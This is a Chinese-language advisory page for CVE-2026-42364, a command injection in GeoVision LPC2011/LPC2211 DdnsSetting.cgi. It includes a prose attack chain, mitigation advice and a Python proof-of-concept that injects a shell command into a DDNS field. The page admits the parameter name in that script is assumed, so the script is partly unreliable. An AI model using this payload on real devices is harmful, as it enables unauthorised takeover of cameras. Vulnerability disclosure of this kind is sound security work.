CVE-2026-42364 CVSS 9.9 严重

CVE-2026-42364 GeoVision OS命令注入漏洞

披露日期: 2026-05-04

来源: 0df08a0e-a200-4957-9bb0-084f562506f9

漏洞信息

漏洞编号

CVE-2026-42364

漏洞类型

操作系统命令注入

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GeoVision LPC2011/LPC2211

漏洞概述

GeoVision LPC2011/LPC2211 1.10版本的DdnsSetting.cgi组件中存在严重的操作系统命令注入漏洞。该漏洞源于DDNS动态域名配置功能的处理逻辑缺陷，攻击者可以通过网络发送特制的DDNS配置请求。由于系统未能对用户提供的配置参数进行严格的过滤和验证，导致恶意命令可以被注入并执行。攻击者只需具备低权限账户即可利用此漏洞，且无需用户交互，成功利用后可导致系统被完全控制，造成机密性、完整性和可用性的全面丧失。

技术细节

该漏洞位于GeoVision设备的Web管理接口中的DdnsSetting.cgi脚本。当设备处理DDNS设置更新请求时，程序直接将用户提交的DDNS服务器地址或主机名等配置参数传递给了底层的系统命令执行函数（如system()或exec()），而未进行必要的安全转义或过滤。攻击者可以通过构造包含特定Shell元字符（如;, &, |, `等）的恶意输入值。当服务器端脚本解析并执行DDNS更新操作时，这些元字符将截断原始命令并拼接攻击者指定的任意系统命令。由于CVSS向量显示为S:C（Scope Changed），这意味着攻击者不仅可以在Web服务进程的上下文中执行代码，还可能利用该漏洞提升权限，进而控制整个底层操作系统，获取Root权限，篡改系统设置或植入后门程序。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的GeoVision LPC2011/LPC2211设备及其Web管理接口。

STEP 2

获取访问权限

攻击者利用低权限账户（默认凭证或弱口令）登录Web管理界面（满足PR:L要求）。

STEP 3

漏洞利用

攻击者在DDNS设置页面，向DdnsSetting.cgi提交包含恶意Shell命令的特制配置数据。

STEP 4

命令执行

服务器端脚本未过滤输入，直接将恶意参数传递给系统Shell，导致攻击者指定的任意代码在服务器上运行。

STEP 5

控制与持久化

攻击者利用反弹Shell或下载恶意软件，完全控制设备，并可能修改系统配置以维持持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the DdnsSetting.cgi endpoint
target_url = "http://<target-ip>/DdnsSetting.cgi"

# Malicious payload to inject OS command
# Example: Creating a file to verify execution
# Shell metacharacters ';' are used to break the original command
injected_command = "; touch /tmp/pwned;"

# Data payload simulating a DDNS configuration update
# The vulnerable parameter is assumed to be ddns_server or similar based on description
payload_data = {
    "ddns_server": "attacker-controlled.com" + injected_command,
    "enable": "on",
    "submit": "Save"
}

# Attacker needs low privilege credentials (PR:L)
credentials = {
    "username": "low_priv_user",
    "password": "password"
}

try:
    # Establish session and authenticate
    session = requests.Session()
    session.post(target_url.replace("DdnsSetting.cgi", "login.cgi"), data=credentials)
    
    # Send exploit request
    response = session.post(target_url, data=payload_data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check target system for command execution result.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

GeoVision LPC2011 1.10

GeoVision LPC2211 1.10

防御指南

临时缓解措施

如果无法立即升级固件，建议暂时禁用设备的DDNS功能以阻断攻击路径。同时，应严格限制对设备管理界面的网络访问，仅允许受信任的内部主机连接，并密切监控系统日志是否存在异常的CGI请求或进程启动记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42364
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42364
3 Details https://www.cvedetails.com/cve/CVE-2026-42364/
4 VulDB https://vuldb.com/cve/CVE-2026-42364
5 Link https://talosintelligence.com/vulnerability_reports/
6 Link https://www.geovision.com.tw/cyber_security.php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表